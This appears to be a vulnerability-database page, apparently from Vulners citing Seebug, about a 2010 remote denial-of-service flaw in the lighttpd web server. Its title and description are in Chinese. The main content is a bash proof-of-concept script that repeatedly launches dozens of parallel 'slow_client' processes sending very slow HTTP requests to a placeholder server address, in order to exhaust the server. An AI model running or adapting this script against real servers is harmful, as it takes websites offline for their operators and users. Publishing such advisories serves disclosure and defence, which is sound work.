Lucene search

K

lighttpd畸形HTTP请求远程拒绝服务漏洞

🗓️ 04 Feb 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 113 Views

lighttpd远程拒绝服务漏

Show more
Related
Code

                                                ##slow_test.sh
for ((j=0;j<1000;j++)) do
  for ((i=0; i<50; i++)) do
  ## slow_client is a C program which sends a HTTP request very slowly
    ./slow_client http://xxx.xxx.xxx.xxx:8080/>/dev/null 2>/dev/null &
  done&
  sleep 3
done
                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
04 Feb 2010 00:00Current
9.3High risk
Vulners AI Score9.3
EPSS0.074
113
.json
Report